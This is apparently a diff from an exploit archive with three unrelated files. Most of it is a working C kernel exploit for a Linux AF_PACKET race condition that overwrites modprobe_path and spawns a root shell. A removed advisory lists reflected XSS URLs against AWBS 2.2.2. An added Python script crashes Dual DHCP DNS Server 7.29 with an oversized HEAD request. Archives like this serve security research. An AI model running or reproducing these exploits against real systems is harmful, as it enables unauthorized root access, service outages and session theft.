+#define PAD 64
+
+int pad_fds[PAD];
+
+struct ctl_table {
+    const char *procname;
+    void *data;
+    int maxlen;
+    unsigned short mode;
+    struct ctl_table *child;
+    void *proc_handler;
+    void *poll;
+    void *extra1;
+    void *extra2;
+};
+
+#define CONF_RING_FRAMES 1
+
+struct tpacket_req3 tp;
+int sfd;
+int mapped = 0;
+
+struct timer_list {
+    void *next;
+    void *prev;
+    unsigned long           expires;
+    void                    (*function)(unsigned long);
+    unsigned long           data;
+    unsigned int                     flags;
+    int                     slack;
+};
+
+void *setsockopt_thread(void *arg)
+{
+    while(barrier) {
+    }
+    setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));
+
+    return NULL;
+}
+
+void *vers_switcher(void *arg)
+{
+    int val,x,y;
+
+    while(barrier) {}
+
+    while(1) {
+        val = TPACKET_V1;
+        x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
+
+        y++;
+
+        if(x != 0) break;
+
+        val = TPACKET_V3;
+        x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
+
+        if(x != 0) break;
+
+        y++;
+    }
+
+    fprintf(stderr,"version switcher stopping, x = %d (y = %d, last val = %d)\n",x,y,val);
+    vers_switcher_done = 1;
+
+
+    return NULL;
+}
+
+#define BUFSIZE 1408
+char exploitbuf[BUFSIZE];
+
+void kmalloc(void)
+{
+    while(1)
+        syscall(__NR_add_key, "user","wtf",exploitbuf,BUFSIZE-24,-2);
+}
+
+
+void pad_kmalloc(void)
+{
+    int x;
+
+    for(x=0; x<PAD; x++)
+        if(socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP)) == -1) {
+            fprintf(stderr,"pad_kmalloc() socket error\n");
+            exit(1);
+        }
+
+}
+
+int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
+{
+    pthread_t setsockopt_thread_thread,a;
+    int val;
+    socklen_t l;
+    struct timer_list *timer;
+    int fd;
+    struct tpacket_block_desc *pbd;
+    int off;
+    sigset_t set;
+
+    sigemptyset(&set);
+
+    sigaddset(&set, SIGSEGV);
+
+    if(pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {
+        fprintf(stderr,"couldn't set sigmask\n");
+        exit(1);
+    }
+
+    fprintf(stderr,"new exploit attempt starting, jumping to %p, arg=%p\n",(void *)func,(void *)arg);
+
+    pad_kmalloc();
+
+    fd=socket(AF_PACKET,SOCK_DGRAM,htons(ETH_P_ARP));
+
+    if (fd==-1) {
+        printf("target socket error\n");
+        exit(1);
+    }
+
+    pad_kmalloc();
+
+    fprintf(stderr,"sockets allocated\n");
+
+    val = TPACKET_V3;
+
+    setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
+
+    tp.tp_block_size = CONF_RING_FRAMES * getpagesize();
+    tp.tp_block_nr = 1;
+    tp.tp_frame_size = getpagesize();
+    tp.tp_frame_nr = CONF_RING_FRAMES;
+
+//try to set the timeout to 10 seconds
+//the default timeout might still be used though depending on when the race was won
+    tp.tp_retire_blk_tov = 10000;
+
+    sfd = fd;
+
+    if(pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {
+        fprintf(stderr, "Error creating thread\n");
+        return 1;
+    }
+
+
+    pthread_create(&a, NULL, vers_switcher, (void *)NULL);
+
+    usleep(200000);
+
+    fprintf(stderr,"removing barrier and spraying..\n");
+
+    memset(exploitbuf,'\x00',BUFSIZE);
+
+    timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);
+    timer->next = 0;
+    timer->prev = 0;
+
+    timer->expires = 4294943360;
+    timer->function = (void *)func;
+    timer->data = arg;
+    timer->flags = 1;
+    timer->slack = -1;
+
+
+    barrier = 0;
+
+    usleep(100000);
+
+    while(!vers_switcher_done)usleep(100000);
+
+    l = sizeof(val);
+    getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);
+
+    fprintf(stderr,"current packet version = %d\n",val);
+
+    pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);
+
+
+    if(pbd == MAP_FAILED) {
+        fprintf(stderr,"could not map pbd\n");
+        exit(1);
+    }
+
+    else {
+        off = pbd->hdr.bh1.offset_to_first_pkt;
+        fprintf(stderr,"pbd->hdr.bh1.offset_to_first_pkt = %d\n",off);
+    }
+
+
+    if(val == TPACKET_V1 && off != 0) {
+        fprintf(stderr,"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\n");
+    }
+
+    else {
+        fprintf(stderr,"race not won\n");
+        exit(2);
+    }
+
+    munmap(pbd, tp.tp_block_size * tp.tp_block_nr);
+
+    pthread_create(&a, NULL, verification_func, (void *)NULL);
+
+    fprintf(stderr,"please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.\n");
+    sleep(1);
+    fprintf(stderr,"closing socket and verifying..");
+
+    close(sfd);
+
+    kmalloc();
+
+    fprintf(stderr,"all messages sent\n");
+
+    sleep(31337);
+    exit(1);
+}
+
+
+int verification_result = 0;
+
+void catch_sigsegv(int sig)
+{
+    verification_result = 0;
+    pthread_exit((void *)1);
+}
+
+
+void *modify_vsyscall(void *arg)
+{
+    unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);
+    unsigned long x = (unsigned long)arg;
+
+    sigset_t set;
+    sigemptyset(&set);
+    sigaddset(&set, SIGSEGV);
+
+    if(pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {
+        fprintf(stderr,"couldn't set sigmask\n");
+        exit(1);
+    }
+
+    signal(SIGSEGV, catch_sigsegv);
+
+    *vsyscall = 0xdeadbeef+x;
+
+    if(*vsyscall == 0xdeadbeef+x) {
+        fprintf(stderr,"\nvsyscall page altered!\n");
+        verification_result = 1;
+        pthread_exit(0);
+    }
+
+    return NULL;
+}
+
+void verify_stage1(void)
+{
+    int x;
+    pthread_t v_thread;
+
+    sleep(5);
+
+    for(x=0; x<300; x++) {
+
+        pthread_create(&v_thread, NULL, modify_vsyscall, 0);
+
+        pthread_join(v_thread, NULL);
+
+        if(verification_result == 1) {
+            exit(0);
+        }
+
+        write(2,".",1);
+        sleep(1);
+    }
+
+    printf("could not modify vsyscall\n");
+
+    exit(1);
+}
+
+void verify_stage2(void)
+{
+    int x;
+    struct stat b;
+
+    sleep(5);
+
+    for(x=0; x<300; x++) {
+
+        if(stat("/proc/sys/hack",&b) == 0) {
+            fprintf(stderr,"\nsysctl added!\n");
+            exit(0);
+        }
+
+        write(2,".",1);
+        sleep(1);
+    }
+
+    printf("could not add sysctl\n");
+    exit(1);
+
+
+}
+
+void exploit(unsigned long func, unsigned long arg, void *verification_func)
+{
+    int status;
+    int pid;
+
+retry:
+
+    pid = fork();
+
+    if(pid == 0) {
+        try_exploit(func, arg, verification_func);
+        exit(1);
+    }
+
+    wait(&status);
+
+    printf("\n");
+
+    if(WEXITSTATUS(status) == 2) {
+        printf("retrying stage..\n");
+        kill(pid, 9);
+        sleep(2);
+        goto retry;
+    }
+
+    else if(WEXITSTATUS(status) != 0) {
+        printf("something bad happened, aborting exploit attempt\n");
+        exit(-1);
+    }
+
+
+
+    kill(pid, 9);
+}
+
+
+void wrapper(void)
+{
+    struct ctl_table *c;
+
+    fprintf(stderr,"exploit starting\n");
+    printf("making vsyscall page writable..\n\n");
+
+    exploit(off->set_memory_rw, VSYSCALL, verify_stage1);
+
+    printf("\nstage 1 completed\n");
+
+    sleep(5);
+
+    printf("registering new sysctl..\n\n");
+
+    c = (struct ctl_table *)(VSYSCALL+0x850);
+
+    memset((char *)(VSYSCALL+0x850), '\x00', 1952);
+
+    strcpy((char *)(VSYSCALL+0xf00),"hack");
+    memcpy((char *)(VSYSCALL+0xe00),"\x01\x00\x00\x00",4);
+    c->procname = (char *)(VSYSCALL+0xf00);
+    c->mode = 0666;
+    c->proc_handler = (void *)(off->proc_dostring);
+    c->data = (void *)(off->modprobe_path);
+    c->maxlen=256;
+    c->extra1 = (void *)(VSYSCALL+0xe00);
+    c->extra2 = (void *)(VSYSCALL+0xd00);
+
+    exploit(off->register_sysctl_table, VSYSCALL+0x850, verify_stage2);
+
+    printf("stage 2 completed\n");
+}
+
+void launch_rootshell(void)
+{
+    int fd;
+    char buf[256];
+    struct stat s;
+
+
+    fd = open("/proc/sys/hack",O_WRONLY);
+
+    if(fd == -1) {
+        fprintf(stderr,"could not open /proc/sys/hack\n");
+        exit(-1);
+    }
+
+    memset(buf,'\x00', 256);
+
+    readlink("/proc/self/exe",(char *)&buf,256);
+
+    write(fd,buf,strlen(buf)+1);
+
+    socket(AF_INET,SOCK_STREAM,132);
+
+    if(stat(buf,&s) == 0 && s.st_uid == 0) {
+        printf("binary executed by kernel, launching rootshell\n");
+        lseek(fd, 0, SEEK_SET);
+        write(fd,"/sbin/modprobe",15);
+        close(fd);
+        execl(buf,buf,NULL);
+    }
+
+    else
+        printf("could not create rootshell\n");
+
+
+}
+
+int main(int argc, char **argv)
+{
+    int status, pid;
+    struct utsname u;
+    int i, crash = 0;
+    char buf[512], *f;
+
+
+    if(argc == 2 && !strcmp(argv[1],"crash")) {
+        crash = 1;
+    }
+
+
+    if(getuid() == 0 && geteuid() == 0 && !crash) {
+        chown("/proc/self/exe",0,0);
+        chmod("/proc/self/exe",06755);
+        exit(-1);
+    }
+
+    else if(getuid() != 0 && geteuid() == 0 && !crash) {
+        setresuid(0,0,0);
+        setresgid(0,0,0);
+        execl("/bin/bash","bash","-p",NULL);
+        exit(0);
+    }
+
+    fprintf(stderr,"linux AF_PACKET race condition exploit by rebel\n");
+
+    uname(&u);
+
+    if((f = strstr(u.version,"-Ubuntu")) != NULL) *f = '\0';
+
+    snprintf(buf,512,"%s %s",u.release,u.version);
+
+    printf("kernel version: %s\n",buf);
+
+
+    for(i=0; offsets[i].kernel_version != NULL; i++) {
+        if(!strcmp(offsets[i].kernel_version,buf)) {
+
+            while(offsets[i].proc_dostring == 0)
+                i--;
+
+            off = &offsets[i];
+            break;
+        }
+    }
+
+    if(crash) {
+        off = &offsets[0];
+        off->set_memory_rw = 0xffffffff41414141;
+    }
+
+    if(off) {
+        printf("proc_dostring = %p\n",(void *)off->proc_dostring);
+        printf("modprobe_path = %p\n",(void *)off->modprobe_path);
+        printf("register_sysctl_table = %p\n",(void *)off->register_sysctl_table);
+        printf("set_memory_rw = %p\n",(void *)off->set_memory_rw);
+    }
+
+    if(!off) {
+        fprintf(stderr,"i have no offsets for this kernel version..\n");
+        exit(-1);
+    }
+
+    pid = fork();
+
+    if(pid == 0) {
+        if(unshare(CLONE_NEWUSER) != 0)
+            fprintf(stderr, "failed to create new user namespace\n");
+
+        if(unshare(CLONE_NEWNET) != 0)
+            fprintf(stderr, "failed to create new network namespace\n");
+
+        wrapper();
+        exit(0);
+    }
+
+    waitpid(pid, &status, 0);
+
+    launch_rootshell();
+    return 0;
+}

platforms/php/webapps/28300.txt

@@ -1,11 +0,0 @@
-source: http://www.securityfocus.com/bid/19226/info
-
-Advanced Webhost Billing System (AWBS) is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. 
-
-An attacker may leverage any of these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
-
-Version 2.2.2 is vulnerable. Other versions may also be affected.
-
-http://www.example.com/contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1 
-http://www.example.com/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername='><script>alert('XSS Vulnerability')%3B</script>&Message=1 
-http://www.example.com/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=&lt;/textarea&gt;<script>alert('XSS Vulnerability')%3B</script>

platforms/windows/dos/40885.py

@@ -0,0 +1,62 @@
+# Title :  Dual DHCP DNS Server 7.29 Buffer Overflow (Dos)
+# Date : 07/12/2016
+# Author : R-73eN
+# Tested on: Dual DHCP DNS Server 7.29 on Windows 7 SP1 (32bit)
+# Vendor : http://dhcp-dns-server.sourceforge.net/
+# Software : https://sourceforge.net/projects/dhcp-dns-server/files/Dual%20DHCP%20DNS%20Server/DualServerInstallerV7.29.exe/download
+# Vulnerability Description:
+# The software crashes when it tries to write to an invalid address.
+#
+# MOV EBX,DWORD PTR SS:[EBP+8] -> EBP+8 is part of our controlled input
+# MOV DWORD PTR SS:[ESP+4],31              
+# MOV DWORD PTR SS:[ESP],1 
+# .........................
+# MOV DWORD PTR DS:[EBX+24],EAX -> Here happens the corruption, EAX fails to move EBX which is our controlled adress + 24 bytes.
+#
+# I think this vulnerability is not exploitable because every module that is loaded has ASLR/DEP/SAFESEH enabled (Win 7)
+# Even if we try to put some valid pointers to manipulate the execution flow we can't because every address on the DualServ.exe 
+# contains 00 which is a badchar in our case.
+#
+
+import socket
+import time
+import sys
+
+banner = "\n\n"
+banner +="  ___        __        ____                 _    _  \n" 
+banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
+banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
+banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
+banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
+print banner
+
+host = ""
+port = 6789
+
+def send_request(host,port,data):
+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	try:
+		s.connect((host,port))
+		s.send(data)
+		print "[+] Malicious Packet Sent [+]\n"
+		
+	except Exception:
+		print "[+] Exploit failed . . .[+]\n"
+	s.close()
+
+	
+
+ebx = "BBBB"
+eax = "CCCC"
+evil = "A" * 497 + eax + "AAAA" + ebx + "D" * 400
+
+if(len(sys.argv) < 1):
+    print '\n Usage : exploit.py ipaddress\n'
+    exit(0)
+else:
+    host = sys.argv[1]
+
+#The method doesn't really matters. It gets valideted only about the length
+request = "HEAD /{REPLACE} HTTP/1.1\r\nHost: " + str(host) + "\r\nUser-agent: Fuzzer\r\n\r\n"
+send_request(host,port,request.replace("{REPLACE}",evil))
+